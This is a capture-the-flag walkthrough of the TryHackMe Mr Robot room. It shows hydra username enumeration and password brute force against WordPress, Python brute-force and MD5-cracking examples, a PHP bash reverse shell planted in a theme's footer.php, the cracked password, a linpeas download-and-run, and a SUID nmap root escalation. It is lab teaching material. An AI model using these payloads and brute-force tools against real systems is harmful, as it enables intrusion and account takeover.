
# Mr Robot CTF

**Room Link:** <https://tryhackme.com/room/mrrobot>

## Scanning

**Kali**

```
nmap -A $VICTIM
```

<figure><img src="/files/icwy1eNlssR4PHlurPoM" alt=""><figcaption></figcaption></figure>

### Scan all ports

No other ports found.

**Kali**

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```

<figure><img src="/files/tpCD5vGO9DSfzaUuW5qg" alt=""><figcaption></figcaption></figure>

### HTTP port 80

I left this running for most of the time I spent on the box. In the end I found the WordPress install and checked robots.txt by hand; the directory scan turned up nothing else of interest.

**Kali**

```
dirb http://$VICTIM:80 /usr/share/wordlists/dirb/big.txt
```

<figure><img src="/files/RTNUJKiiIYE3ETgS8dGv" alt=""><figcaption></figcaption></figure>

#### Key 1

<figure><img src="/files/8DWKGXlSaa0oPVWzaS9E" alt=""><figcaption></figcaption></figure>

**Downloaded fsocity.dic**

<figure><img src="/files/UjxgFsHWPoUweT4AFZDK" alt=""><figcaption></figcaption></figure>

Refreshing the page lands on a WordPress site.

<figure><img src="/files/iJlNoHcSSh13VyW3jX5P" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/HvVoGjVGCZSSmjubVbdR" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ozRHjk4ogLGKz6OPCTkX" alt=""><figcaption></figcaption></figure>

Next, test which WordPress usernames exist. wp-login.php leaks this: a non-existent account gets an "Invalid username" error, while an existing account with the wrong password gets a different message ("... is incorrect."). Hydra's failure string below is that "Invalid username" text, so every name that does not trigger it is reported as a valid user.

<figure><img src="/files/B0yBPiSXRPh2W1p3GyBx" alt=""><figcaption></figcaption></figure>

**Kali**

```
# -L: username list, -p test: one throwaway password; the failure string only appears for accounts that do not exist
hydra -L fsocity.dic -p test $VICTIM http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F$VICTIM%2Fwp-admin%2F&testcookie=1:Invalid username" -V -t 30
```

<figure><img src="/files/HjyY8nqYh00UuYeBHgJR" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/TUwW3f0uM96dPvc8dXvE" alt=""><figcaption></figcaption></figure>

Because fsocity.dic has so many entries, I reduced it as far as I could by removing duplicates and entries I judged unlikely to be passwords.

**Kali**

```
# Remove duplicates (most of the file is repeated lines)
sort -u fsocity.dic > new-fsocity.dic
# Remove lines of 4 or fewer characters ({,4} matches 0 to 4 repetitions, GNU sed)
sed -r '/^.{,4}$/d' new-fsocity.dic > new-new-fsocity.dic
# Remove lines that are only digits
awk '! /^[0-9]+$/' new-new-fsocity.dic > nonums.dic
# Remove lines longer than 11 characters (11 chars followed by at least one more)
sed '/^.\{11\}./d' nonums.dic > final.txt
```

**Kali**

```
# -l: a single username (-L expects a file of usernames); -P: the reduced wordlist built above
# failure string "is incorrect." is the wrong-password error for a valid account
hydra -l Elliot -P final.txt $VICTIM http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F$VICTIM%2Fwp-admin%2F&testcookie=1:is incorrect." -V -t 30
```

<figure><img src="/files/oSGugUC4ZSiiYuRxlp4d" alt=""><figcaption></figcaption></figure>
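Both hydra runs above rely on the same oracle: wp-login.php's error text tells the attacker whether a username exists, and the absence of any error block means the credentials worked. The following is an added example (not code from the walkthrough) that factors that oracle out into a small Python module. `classify` applies the same "Invalid username" / "is incorrect." markers the hydra commands use, `enumerate_users` and `guess_password` reproduce the two attacks on top of it, and `wp_post` is an assumed real transport that POSTs the same form fields hydra sends. `fake_wp_login` and its `hunter2` password are a constructed stand-in for the target so the block runs offline; the error wording matches the WordPress release on this box, and newer WordPress versions have reworded these messages, so the markers must always be checked against the target first.

```python
"""WordPress login oracle: username enumeration and success detection.

Added example (not from the walkthrough). wp-login.php answers with
different error text depending on whether the username exists, which is
what both hydra runs key on:
  "Invalid username"   -> the account does not exist
  "... is incorrect."  -> the account exists, password wrong
  no error block       -> valid credentials (WordPress sets cookies/redirects)
`post` is any callable (username, password) -> response body, so the logic
can be exercised offline against the constructed stand-in at the bottom.
"""
import re
import urllib.parse
import urllib.request
from typing import Callable, Iterable, List, Optional

INVALID_USER = "Invalid username"
BAD_PASSWORD = re.compile(r"The password you entered for the username .*? is incorrect")


def classify(body: str) -> str:
    """Map a wp-login.php response body to one of three outcomes."""
    if INVALID_USER in body:
        return "no-such-user"
    if BAD_PASSWORD.search(body):
        return "valid-user"
    return "logged-in"


def enumerate_users(candidates: Iterable[str], post: Callable[[str, str], str]) -> List[str]:
    """Names the target admits exist, probed with a throwaway password (hydra -L list -p test)."""
    return [name for name in candidates if classify(post(name, "test")) != "no-such-user"]


def guess_password(user: str, wordlist: Iterable[str], post: Callable[[str, str], str]) -> Optional[str]:
    """First candidate that logs in, or None (hydra -l USER -P wordlist)."""
    for pw in wordlist:
        if classify(post(user, pw)) == "logged-in":
            return pw
    return None


def wp_post(base_url: str) -> Callable[[str, str], str]:
    """Real transport: POST the same form fields hydra sends to /wp-login.php.

    base_url is an assumed target, e.g. http://10.10.70.148; not used offline.
    """
    def post(username: str, password: str) -> str:
        data = urllib.parse.urlencode({
            "log": username,
            "pwd": password,
            "wp-submit": "Log In",
            "redirect_to": f"{base_url}/wp-admin/",
            "testcookie": "1",
        }).encode()
        req = urllib.request.Request(f"{base_url}/wp-login.php", data=data, method="POST")
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return post


# --- constructed stand-in for the target so the block runs offline ---
FAKE_USERS = {"Elliot": "hunter2"}  # constructed password, not the box's


def fake_wp_login(username: str, password: str) -> str:
    """Mimics the three wp-login.php responses the oracle distinguishes."""
    if username not in FAKE_USERS:
        return '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>'
    if FAKE_USERS[username] != password:
        return ('<div id="login_error"><strong>ERROR</strong>: The password you entered '
                f'for the username <strong>{username}</strong> is incorrect.</div>')
    return ""  # real WordPress would 302 to redirect_to with no error markup


if __name__ == "__main__":
    users = enumerate_users(["admin", "Elliot", "mr.robot"], fake_wp_login)
    print("valid users:", users)
    print("password for Elliot:", guess_password("Elliot", ["password", "hunter2"], fake_wp_login))
```

Against a live target, swap `fake_wp_login` for `wp_post("http://" + VICTIM)`; the enumeration step is the one worth running first, since it turns a two-dimensional users-by-passwords brute force into a single password list per confirmed user.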

## Reverse Shell

### Reverse Shell Failed Attempt

**revshell.php code**

```
<?php
// Replace $KALI with the attacker IP before uploading: inside a PHP double-quoted
// string it would otherwise be interpolated as an (undefined) PHP variable.
exec("/bin/bash -c 'bash -i >& /dev/tcp/$KALI/443 0>&1'");
?>
```

**Kali**

```
vi revshell.php
zip revshell.zip revshell.php
nc -lvnp 443
```

<figure><img src="/files/cQgR4BBnaVtkEJJ9gGJp" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/cWhDGyULrrhKellHVFgp" alt=""><figcaption></figcaption></figure>

Connection is made but it isn't stable.

<figure><img src="/files/oihC5zCXDHsFD9TiASm4" alt=""><figcaption></figcaption></figure>

### Reverse Shell

wpscan found that the twentyfifteen theme is installed.

**Kali**

```
wpscan --url http://$VICTIM
```

<figure><img src="/files/oQEHcKY6vPPY01Aw5Lmo" alt=""><figcaption></figcaption></figure>

**Kali**

```
nc -vlnp 443
```

I added the same PHP reverse shell to the twentyfifteen theme's footer.php, which is included on every page render. Browsing back to http://$VICTIM/join then triggered it and the listener caught the shell.

<figure><img src="/files/u4IQbdvcZsvp0VomwRJx" alt=""><figcaption></figcaption></figure>

Upgrade to a fully interactive TTY (tab completion, Ctrl+C handled by the remote shell instead of killing the listener)

**Victim**

```
# spawn a pty so the remote side has a real terminal
python -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z to background the shell, then put the local terminal in raw mode and resume it
stty raw -echo; fg
```

**Victim**

```
cd /home/robot
ls
cat password.raw-md5 
```

<figure><img src="/files/SeDdp6yoXyJVpD98kiRM" alt=""><figcaption></figcaption></figure>

**Kali**

```
# -m 0: raw MD5. If the file is in user:hash form, add --username to both commands
hashcat -m 0 password.raw-md5 /usr/share/wordlists/rockyou.txt
# print the cracked hash:plaintext pairs from the potfile
hashcat -m 0 password.raw-md5 /usr/share/wordlists/rockyou.txt --show
```

<figure><img src="/files/bLlVTK7Bbmb1xQ4yi14f" alt=""><figcaption></figcaption></figure>
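To make the hashcat step concrete, here is an added example (not code from the walkthrough) that does what `hashcat -m 0 <hashfile> <wordlist>` does for raw MD5: parse the hash file, hash each wordlist candidate once, look it up against every loaded target, and print results in the `--show` layout. It accepts both bare hashes and `user:hash` lines, the form hashcat needs `--username` for. The hash file and wordlist are constructed; the digest is MD5("abcdefghijklmnopqrstuvwxyz"), which is an RFC 1321 test vector and also the password the walkthrough recovers, and the `robot` username on that line is an assumption.

```python
"""Raw-MD5 dictionary attack, the logic behind `hashcat -m 0 <hashfile> <wordlist>`.

Added example (not from the walkthrough). Accepts hash-file lines either as a
bare 32-hex MD5 or as `user:hash` (the form hashcat needs --username for).
Every wordlist entry is hashed once and looked up against all loaded targets,
so cost is one MD5 per candidate regardless of how many hashes are loaded.
"""
import hashlib
import re
from typing import Dict, Iterable, List, Optional

HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")


def parse_hash_file(lines: Iterable[str]) -> Dict[str, Optional[str]]:
    """Return {hash_lower: username_or_None}. Rejects anything that is not raw MD5."""
    targets: Dict[str, Optional[str]] = {}
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        user, sep, digest = line.rpartition(":")
        if not sep:                 # no separator: bare hash
            user, digest = None, line
        if not HEX32.match(digest):
            raise ValueError(f"not a raw MD5 hash: {line!r}")
        targets[digest.lower()] = user or None
    return targets


def crack(targets: Dict[str, Optional[str]], wordlist: Iterable[str]) -> Dict[str, str]:
    """Return {hash: plaintext} for each target whose preimage is in wordlist."""
    cracked: Dict[str, str] = {}
    for raw in wordlist:
        word = raw.rstrip("\r\n")
        digest = hashlib.md5(word.encode("utf-8")).hexdigest()
        if digest in targets and digest not in cracked:
            cracked[digest] = word
            if len(cracked) == len(targets):
                break               # nothing left to find, stop early
    return cracked


def show(targets: Dict[str, Optional[str]], cracked: Dict[str, str]) -> List[str]:
    """Lines in the shape of `hashcat --show`: [user:]hash:plaintext."""
    out = []
    for digest, user in targets.items():
        if digest in cracked:
            prefix = f"{user}:" if user else ""
            out.append(f"{prefix}{digest}:{cracked[digest]}")
    return out


# Constructed inputs. The digest is MD5("abcdefghijklmnopqrstuvwxyz"), an RFC 1321
# test vector and the password the walkthrough recovers; the "robot" user and the
# user:hash layout are assumptions (the layout hashcat reads with --username).
HASH_FILE = ["robot:c3fcd3d76192e4007dfb496cca67e13b"]
WORDLIST = ["password", "123456", "abcdefghijklmnopqrstuvwxyz", "letmein"]  # stand-in for rockyou.txt

if __name__ == "__main__":
    t = parse_hash_file(HASH_FILE)
    for line in show(t, crack(t, WORDLIST)):
        print(line)
```

With a real file, pass `open("password.raw-md5")` and `open("/usr/share/wordlists/rockyou.txt", errors="replace")` in place of the constructed lists; rockyou contains non-UTF-8 lines, so the `errors="replace"` matters.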

**Victim**

```
su robot
Password: abcdefghijklmnopqrstuvwxyz
```

<figure><img src="/files/Bz98Ivcy0k9AbmQOZz34" alt=""><figcaption></figcaption></figure>

### LinPeas

**Kali**

```
# download linpeas to Kali (no pipe to sh: wget writes the file, and it must run on the victim, not here)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
# serve it to the victim over HTTP on port 81
python2 -m SimpleHTTPServer 81    # or: python3 -m http.server 81
```

**Victim**

```
cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh 
./linpeas.sh
```

<figure><img src="/files/eNPIGArgqVT1sz5wL6WN" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

**Victim**

```
# old nmap builds (2.02-5.21) offer --interactive; when the binary carries the SUID root bit,
# the shell escaped from it runs as root
/usr/local/bin/nmap --interactive
nmap> !sh
```

<figure><img src="/files/xpWXgn63luNTT9d25Hme" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/lor6IJ3b5x41FFRlVNp3" alt=""><figcaption></figcaption></figure>
